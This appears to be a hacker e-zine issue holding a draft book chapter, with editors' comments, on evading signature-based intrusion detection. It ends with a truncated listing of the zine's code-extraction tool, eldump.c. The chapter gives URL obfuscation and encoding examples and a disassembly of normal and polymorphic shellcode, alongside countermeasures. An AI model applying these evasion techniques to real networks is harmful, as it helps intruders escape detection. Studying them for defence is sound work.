If we look back towards our snort signatures, we can see that quite clearly one of them specifies the complete path name for the chgrp command. This signature is supposed to alert to the execution of some command through a Web server. Any attacker who is aware of the semantics for these rules could easily modify their attack to play any number of tricks in hopes of evading this match. This rule itself is quite specific about the path and name for the chgrp command. We can plainly see that if the command resided in a different directory than /usr/bin, this signature would fail. Also, if the attacker were to simply ensure that their path environment variable were correctly set, they may just issue chgrp, without the complete path to evade a signature match. Should the IDS be configured to alert when any of these variations are present? How many signatures would our IDS have if we were to account for these many variations? Alternate Data Encodings Largely implemented to support multiple languages, the standard text sent between a web client and server may be encoded so that it should be interpreted as Unicode. Unicode gives the capability to represent any known symbol (the Unicode value for Yung is U+6C38). It also presents all new challenges to IDS vendors, as these values must be inspected and converted into ASCII for standard processing. This challenge is not that difficult to overcome; most systems implement a practice known as protocol normalization. Protocol normalization will take an input string and digest all known encodings, white space, and any protocol-specific delimiters in an attempt to produce the most basic form of the input. Did you mean ASCII? Yes Unfortunately all of the normalizations imaginable cannot overcome the challenge of monitoring closed source software packages. Without detailed information of the inner workings of a system there can be no accounting for undocumented nonstandard features.
IIS had one such “special feature”: %u#### encoding was allowed as an alternate to the normal Unicode encodings (%####). The famed “Code Red” worm had used this previously unknown technique to bypass many IDS signatures tuned to match for the specific .ida buffer overflow vulnerability. Lack of information is the worst enemy of a network defender. Consider the following imaginary attack: Attack String: GET /vulnerable.cgi?ATTACK=exploit-code Signature: alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-ATTACKS vulnerable.cgi attempt"; flags:A+; content:"get /vulnerable.cgi?ATTACK=exploit-code";nocase; sid:1337; rev:1; classtype:web-application-attack;) Modified Attack String: GET /vulnerable.cgi?ATTACK=exploit-code The attack here seems to exploit some Common Gateway Interface (CGI) application, and a simple signature is developed to alert to the known vulnerability. This signature would provide a very high level of assurance that there would be relatively few false positives, as the exploit-code is embedded right into the signature. However, we can see that if the attacker were able to send a modified attack string, through the use of some additional white space, they should be able to bypass a signature match. This exercise again illustrates the difficulty of signature development. If the signature left out the portion of the exploit code, there may be a great number of false positives, whereas if they embed some of the exploit code, the chance for evasion is greatly increased. This is an incredibly simplistic example and is not that difficult to overcome. Adequate normalizations should be able to eliminate white space and allow for a signature match. Web Attack Techniques A number of Web attack issues have been analyzed by RFP; see for instance “A look at whisker's anti-IDS tactics” from December 1999 () He has implemented a number of them into his whisker vulnerability scanner. We'll take a look at some of them in the following sections.
Since RFP is working on this book — he should probably take a look at this section. From past experience I like him to look at what people are writing about him. THX. Ryan has sent the chapter to RFP. Method Matching The method of a HTTP request informs the server what type of connection to anticipate (GET, HEAD, POST, etc.). RFP found that many IDS signatures had completely failed to recognize any other methods. This is a somewhat depressing fact as many IDS vendors claim to be not totally dependent on signature matching to generate an alert. Directory and File Referencing A slash, the character that specifies a separation between directory and file names (/), can be represented in a couple of different ways. The simplest form is double or multiple slashes (/some//file.html = /some////file.html). These tricks will fool the simplest signature matches, providing there are no normalizations to counteract. Another form of the same trick (this works only on IIS Web servers), is to use the DOS slash character (\). If an IDS were not aware of this convention, it would not be able to generate a match. These tricks work because they can reference a file by a different pathname. Amazingly enough, resolving a pathname is substantially harder than you would think (this is what has led to a number of remote compromises in IIS, remember Unicode). Dot, the path to the current directory, and double dot, the path to the previous directory, can be used to obfuscate a file reference. An attacker may only need to use his or her imagination in constructing unique paths; all of these are equivalent requests: GET /some/file.cgi HTTP/1.0 GET /.././some////file.cgi HTTP/1.0 GET /./some//..\..///some/./file.cgi HTTP/1.0 A form of the aforementioned evasions is what RFP calls parameter hiding. This evasion is based on the assumption that some IDSs may only evaluate a request until it encounters a question mark (?, or its hex-encoded value %3f).
This character is typically what will denote that any further parameters are arguments to a Web application. If the IDS simply wanted to alert to the request of a file, it may not fully evaluate the expression. The following two requests are equivalent: GET /real.file HTTP/1.0 GET /%3f/file/does/not/exist/../../../../../real.file HTTP/1.0 Countermeasures As discussed previously, a signature based IDS may be able to normalize the communications stream. That is, as it inputs data destined for a HTTP server, it should apply some logic to reduce the input into its lowest common denominator (a single /, or resolving directory references). Partial signature matches may also help, if a sensor does not enforce a strong 100% match, they should be able to account for some variation of many exploit types. Using Code Morphing Evasion Polymorphism is the ability to exist in multiple forms, and morphing is the processes that is used to achieve polymorphism. The objective of polymorphic code is to retain the same functional properties while existing in a structurally unique form. A NIDS has only the opportunity to inspect information as it exists on the wire; this would then only allow the structure of the exploit to be inspected. This feature had allowed viruses to remain undetected for quite some time. The only difference is that a virus scanner has the opportunity to inspect disk files instead of network data. The way that most virus scanning engines have tackled this problem is through the use of heuristic scanning techniques; this is similar to what a host based IDS would do (identifying suspicious events, inappropriate file access). Polymorphism is achieved through taking the original attack payload and encoding it with some form of a reversible algorithm. All of the nop-sled instructions are substituted with suitable replacements. 
This encoded payload is then sent over the network with a small decoding function prefixed (this decoder is also dynamically generated to avoid a signature match). When the exploit runs on the target, the decoder will unwrap the original payload and execute it. This way, the original functionality is maintained. nop-sled? Yup, check out the buffer-overflow chapter. Polymorphic shellcode is discussed thoroughly in this author's paper that was released in early 2001 (). An engine is included for use in any current or future vulnerabilities. The basis for polymorphic code generation is that there is always more than one way to calculate a value. If, to exploit a vulnerability, we had to calculate the value of 4, we could do any of 2+2, 3+1, 6-2 and so on. There are literally endless methods to calculate a given value—this is the job of an exploit, the possessing of some machine instructions. To a NIDS examining network traffic there is no way to identify 2+2 being equivalent to 3+1. The NIDS is only given the low-level machine instructions to evaluate against a known pattern; it does not interpret the instructions as the target host will. This technique has the ability to mask any exploit from detection, from any specific rule to the general. The only opportunity for a signature based NIDS to formulate a match is if a signature for the small decoder is able to be determined. To date I have not seen any signatures or techniques developed for this class of polymorphic shellcode. Table 16.1 shows a side by side view of two executions of a polymorphic shellcode engine. What should alignment of multiple items within table columns be?
Table 16.1 Insert Title HereShellcode Variations Addresses Normal Shellcode Possible Polymorphic shellcode #1 Possible Polymorphic shellcode #2  0x8049b00 0x8049b01 0x8049b02 0x8049b03 0x8049b04 0x8049b05 0x8049b06 0x8049b07 0x8049b08 0x8049b09 0x8049b0a 0x8049b0b 0x8049b0c 0x8049b0d 0x8049b0e 0x8049b0f 0x8049b10 0x8049b11 0x8049b12 0x8049b13 0x8049b14 0x8049b16 0x8049b17 0x8049b19 0x8049b1b 0x8049b1e 0x8049b20 0x8049b21 0x8049b23 0x8049b25 0x8049b26 0x8049b28 0x8049b2a 0x8049b2b 0x8049b2d 0x8049b2f 0x8049b31 0x8049b33 0x8049b35 0x8049b36 nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop jmp 0x8049b38 pop %esi mov %esi,%ebx mov %esi,%edi add $0x7,%edi xor %eax,%eax stos %al,%es:(%edi) mov %edi,%ecx mov %esi,%eax stos %eax,%es:(%edi) mov %edi,%edx xor %eax,%eax stos %eax,%es:(%edi) mov $0x8,%al add $0x3,%al int $0x80 xor %ebx,%ebx mov %ebx,%eax inc %eax int $0x80 push %ebx cmc pop %edx xchg %eax,%edx lahf aas push %esi push %esp clc push %edx push %esi xchg %eax,%ebx dec %ebp pop %ecx inc %edi dec %edi inc %ecx sahf pop %edi sti push %esp repz dec %eax push %ebp dec %esp pop %eax loope 0x804da1b js 0x804d994 daa sbb $0x15,%al pop %eax out %eax,(%dx) push %ebp dec %edi jp 0x804d966 movl %es:(%ecx),%ss mov $0x15d5b76c,%ebp adc %edi,(%edi) loopne 0x804d9a0 push %ebp xchg %eax,%ecx das pushf inc %ecx xchg %eax,%ebp pop %edi push %edi dec %ebp dec %ebx lahf xchg %eax,%edx push %ebx pushf inc %esp fwait lahf pop %edi dec %ecx dec %eax cwtl dec %esp xchg %eax,%ebx sarb $0x45,(%ecx) mov 0xffffff90(%ebx),%ebp dec %edi mov $0xd20c56e5,%edi imul $0x36,0xee498845(%esi),%ebx dec %ecx and %ah,%cl jl 0x804da3d out %al,$0x64 add %edi,%eax sarl %cl,0x4caaa2a0(%ebp,%eax,2) nop cmp 0x5cd8733(%eax),%ebx movsl %ds:(%esi),%es:(%edi) push %ss int $0x14 push $0xbffff586 xchg %dh,%ch (bad)   As you can plainly see, there is very little correlation between the three executions. 
There are a huge number of permutations that can be used. Unfinished thought? What’s the (bad) there? That is part of the encoded shellcode; its value did not decode by gdb as a valid instruction so it just pops up as “(bad)”. Countermeasure It is apparent that most IDSs are not always quite ready to run out of the box. They require frequent updating and maintenance to yield long-term success. The IDSs that do have hope of detecting unknown forms of attack are anomaly detection based. These systems do not use signatures at all. They instead monitor all network communications as they occur and attempt to build a high level image of typical traffic. A statistical anomaly would then trigger an alert. As the system matures and gains more entropy into its database, it would then theoretically become more accurate. There is some question whether or not a purely anomaly-based detection engine would be very effective, as exploit attempts seem to be quite normal in day-to-day network operation and may fall into the baseline of these systems. As in all things, a little of each is not a bad idea. A strong signature based system supplemented by an anomaly based detection engine should yield a high level of assurance that most intrusion events are monitored. In the endless security game of cat and mouse, one can forecast the generation of polymorphic statistically normalized attack engines that should provide one more hurdle for NIDS developers to overcome. Summary Signature based IDS sensors have many variables to account for when attempting to analyze and interpret network data. Many challenges continue to elude these systems. The lack of information that is available for inspection is difficult to overcome.
However, the rate at which many IDS sensors have been maturing is quite promising; Gigabit speeds and flexible architectures supported by an ever growing security community push forward to configure systems that are capable of detecting all but the most obtuse and infrequent attack scenarios. At every layer of the network stack there are difficulties with maintaining a consistent view of network traffic and the effect of every packet being transmitted. It is quite clear that an attacker has certain advantages, being able to hide in a sea of information while being the only one aware of their true intention. Packet layer evasions have been well documented throughout the past several years. IDS vendors are quite aware of the many issues surrounding packet acquisition and analysis. Most networks are beginning to filter “suspicious” packets in any case, that is, any types with options and excessive fragmentations. Perhaps in the coming years network layer normalizations will become commonplace and many of these evasion possibilities will evaporate. The difficulty with analyzing the application layer protocols continues to cause ongoing headaches. Some proxy solutions have begun to take hold but the bottleneck that these systems cause is often too great. They also suffer from similar issues as IDSs, unable to identify classes of attacks that they were not originally intended for. It is quite acceptable to quash malformed TCP/IP packets in the case of an error; a legitimate end system would simply retransmit. The same is not true for higher layers; a NIDS may have an extremely limited understanding of application protocols and the information they transmit. Polymorphic attacks present a significant challenge that cannot be easily solved with a purely signature based system. These attacks may exist in virtually limitless combinations. Fix grammar IDS evasion will continue to be a way of life on the Internet.
There is an ever-renewing tide of tools and techniques that are developed and designed for large-scale implementation (eventually raising the everyday script kiddie into a more advanced skill set) to make the job of detection more difficult. One should continually monitor and investigate network activity to gain an understanding of what to expect on day-to-day operations. One should hold dear the principles of least privilege, segmentation and auditing to ensure their overall network posture remains as secure as possible. Clarify? Solutions Fast Track Author: Please fortify these bullet points so they are all full sentences. They should also be a bit more informative and useful to the reader who wants to use them to brush up on the chapter material—you could add a sentence to each that makes it clearer why that particular point is relevant to the chapter. Understanding How Signature-Based IDSs Work Capabilities defined in signature database The capabilities of a NIDS are defined by a signature database. This enforces the requirement for frequent updates to combat the frequency of new vulnerabilities. Difficult to extrapolate from defined database Most NIDS do not alert even to slight variations of the defined signatures. This affords an attacker the ability to vary their attack to evade a signature match. Signatures are very specific to a vulnerability; slight variations will be missed Increase the processing overhead required for detection Attackers will continue to vary their evasion techniques such that the processing required to monitor and detect is greatly increased. This would contribute to DoS and evasion possibilities. Using Packet Level Evasion Many vendors implement TCP/IP with slight variations. A NIDS has a difficult time in constructing a view of network communications as they appear to other systems. This inconsistent view is what allows an attacker to evade detection.
Hosts may not adhere to RFC specifications and allow some packets where the NIDS may not. NIDS do not have enough information from the wire to reconstruct TCP/IP communications. With the options and states available in a TCP/IP stack, some ambiguities form as to how a host would interpret information; there is an insufficiency of information transmitted between systems when communicating. Fragrouter and congestant are effective evasion tools. They implement a number of documented NIDS evasion techniques. Using Protocol and Application Protocol Level Evasion Application protocols are difficult to interpret Application protocols are verbose and rich in function. There are many subtle, antiquated and obscure application nuances that make effective application protocol decoding difficult. An attacker may compromise even the slightest oversight. Applications tend to allow for slight variation; developers intentionally build in error correcting cases that attempt to make sense of any request, no matter how malformed. With a lack of strict compliance to defined specifications, it is difficult for the NIDS to determine the behavior of a network application. Multiple encoding options exist for data representation; Unicode, uuencoded or hex encoded options exist in many application protocols. These alternate representations complicate the development of detection engines. Using Code Morphing Evasion There is always more than one way to do it. When detection hinges on the identification of application code, there are many alternatives to code generation. Code may be randomly generated The code of an attack may be pseudo randomly generated. Any number of instructions can accomplish similar tasks; the code must simply function, there is no requirement of performance or other optimization benefits. Most exploits will vary from host to host. Variations can be incorporated even when restrictions are placed on the length or type of codes possible.
Frequently Asked Questions Q: How many IDSs do I need to make them more effective? A: All networks are different and require varying levels of monitoring. Your particular risk tolerance should help you find this out though. A network which desires a high level of assurance that they are detecting many intrusion events, should have at least one sensor per network segment (layer 2). It is also desirable to have multiple vendor types implemented when an even higher level of security is needed (one vendor’s strengths would hopefully fill in gaps from another) Q: Aren’t these techniques too advanced for most attackers? A: Just like most other technologies, attack methodologies and techniques are eventually turned into boilerplate applications that anybody can wield. The layout of the virtual battlefield may change in an instant. The next big worm might wield these techniques, and force a sea-change in the IDS market. Q: How do I choose the best IDS? A: Continue to do as much research as possible. The biggest tool that a network architect has is that only they are aware of all the tricks that are deployed on the enterprise. Be creative, use multiple vendors’ technologies, and implement honeypots for advanced warning of unknown techniques and vulnerabilities. Homegrown technologies (if properly tested and implemented) often do a great service when a high degree of security is required. Q: Where can I get information about new evasion attacks? A: The “underground” scene is typically the catalyst for advancements in security technologies. Frequent online publications, get a feel for where useful information may come from. There is no single source for where all new papers will be distributed. Check out: antisec (http://anti.security.is) Phrack (http://) Packetstorm () Technotronic (http://www.technotronic.com/) Drop a couple of names, if you would — if you like Phrack, some mailing list, etc., please mention here. Q: What do I do if I am inundated with alerts?
A: Secure systems rely on compartmentalization to hopefully contain intruders. If you see that you are being attacked at an abnormal pace, isolate and separate the troubled systems and attempt to identify if there are some hosts with some well-known vulnerabilities or exposures. Correlate your logs and IDS events to give you a better picture of what may be going on. Do not rely on authorities and the network administrators of the attacking networks; they are usually far too overworked or uninterested to give a respectable amount of support. Q: How do I know that my IDSs are working? A: Ongoing auditing and testing should be done to ensure that networking systems are properly implemented. Independent reviewers should always be apart of secure systems to ensure a fresh set of eyes evaluate a network architecture and IDS implementation. [END_CUT] ch16 [END_DIR] articles .~e~----------------------------------------------------------~e~. ; *16* ELDUMP & ELTAG ~el8 ez1ne t00lz -- s1rsyko ; `----------------------------------------------------------------' [BEGIN_DIR] . [CUT_HERE] eldump.c /* -+-+ cat <<'/*++--++*'> eldump.c # */ /********************************************** * released under (E) licensing ... 
*
* (E) RULES AND REGULATIONS
*
**********************************************/
/*******************************************
 * eldump.c for standard UNIX compilers    *
 * next version:                           *
 *                                         *
 * +article extraction (ability to   *(E)* *
 *  specify article number)          *[~]* *
 * +code extract by article number   *[E]* *
 * +GUI interface for file viewing   *[L]* *
 *  (most likely curses based)       *[8]* *
 * +ability to update code/articles  *[`]* *
 *  via updates/corrections posted   *[9]* *
 *  on ~el8 website                  *[9]* *
 * +much cooler/faster/stronger/portable   *
 * +Versions for DOS C/COBOL/Asm/Pascal    *
 *******************************************/

/* NOTE(review): the eight header names did not survive extraction of this
 * listing (only the bare directives remain); restore them from the original
 * eldump.c before compiling.  They are left as-is here rather than guessed. */
#include
#include
#include
#include
#include
#include
#include
#include

/**************************************
 * next version of eldump will have   *
 * a lot more features, this is just  *
 * a basic code extraction version.   *
 *                     - team ~el8    *
 *                                    *
 * #define ISH_START "[SOI] %s"       *
 * #define ARTICLE_START "[BOW] %s"   *
 * #define ARTICLE_END "[EOW]"        *
 * #define ISH_END "[EOI]"            *
 **************************************/

/* for verbosity: three distinct bits, presumably combined into `verbose`,
 * one per -v given on the command line -- confirm in main() */
#define VERBOSE 0x01
#define VERY 0x10
#define LOTS 0x20

/* char array sizes (bytes, terminator included) */
#define LINELEN 80    /* one line of issue text -- assumed, TODO confirm */
#define BUFLEN 255    /* one directory path; BaseDirectory is filled to this size by getcwd() in main() */

/* Issue Tag Defines: scanf-style patterns for the markers that delimit
 * directories and code listings inside an issue, e.g.
 *   [BEGIN_DIR] articles ... [CUT_HERE] eldump.c ... [END_CUT] eldump.c ... [END_DIR] articles
 * The *_ARGS values look like the number of conversions each pattern yields
 * (one %s each) -- verify against the functions that consume them (code(), extr()).
 * NOTE(review): the %s argument of every tag is a file or directory name read
 * from the issue text, i.e. untrusted input.  Any copy or format of it into the
 * fixed-size buffers below must be length-bounded, and a name that could leave
 * BaseDirectory (a leading '/' or a ".." component) should be rejected -- check
 * code()/extr(). */
#define CODE_START "[CUT_HERE] %s"
#define CODE_START_ARGS 1
#define DIR_START "[BEGIN_DIR] %s"
#define DIR_START_ARGS 1
#define DIR_END "[END_DIR] %s"
#define DIR_END_ARGS 1
#define CODE_END "[END_CUT] %s"
#define CODE_END_ARGS 1

/* `while (n)` spelled as a for-loop; note the argument is not parenthesized. */
#define loop(n) for(;n;)

/* global vars */
FILE *TextFD;                   /* the issue file being read -- presumably opened in main(), confirm */
char BaseDirectory[BUFLEN],     /* working directory at start-up (getcwd() in main()) */
     buf[LINELEN],              /* current line of issue text -- assumed, TODO confirm */
     CodeDir[BUFLEN + BUFLEN],  /* sized for two BUFLEN components, presumably BaseDirectory plus a tag name -- confirm */
     tmp[LINELEN];              /* scratch buffer, same size as buf */
int verbose = 0,                /* verbosity bits (VERBOSE / VERY / LOTS) */
    linez = 0, codez = 0, dirz = 0;  /* counters; the names suggest lines, listings and directories seen -- confirm */

/* Header text; judging by its content it is prepended to each extracted
 * listing -- confirm in code().  The literal continues on the next line of
 * the original file. */
const char *license = \
"/***********************************************\n"
" * released under (E) licensing ... *\n"
" ***********************************************/\n"
"/* contact ahuger@securityfocus.com for full license */\n"
"/* code copyrighted by ~el8 -- don't infringe! 
*/\n\n"; /********************** * int article(char *); * int issue(char *); **********************/ /* function prototypes */ int code (char *); int extr (char *); int main (int argc, char *argv[]) { int NumberOfFiles; // For multiple files getcwd (BaseDirectory, BUFLEN); // error checking is for pussiez setvbuf (stderr, (char *) NULL, _IONBF, 0); if (argc < 2) // no options specified { fprintf (stderr, "\033[0;36m" ".---------------------------------------.\n" "|\033[1;36m /\\/| _ ___ _ \033[0;36m |\n" "|\033[1;36m |/\\/ ___| |( _ ) _____ _| |_ _ __ \033[0;36m|\n" "|\033[1;36m / _ \\ |/ _ \\ / _ \\ \\/ / __| '__| \033[0;36m|\n" "|\033[1;36m | __/ | (_) || __/> <| |_| | \033[0;36m|\n" "|\033[1;36m \\___|_|\\___/ \\___/_/\\_\\\\__|_| \033[0;36m|\n" "`---usage-------------------------------'\n" "\033[m\n" "\033[7m %s [file1 file2 file3 ...]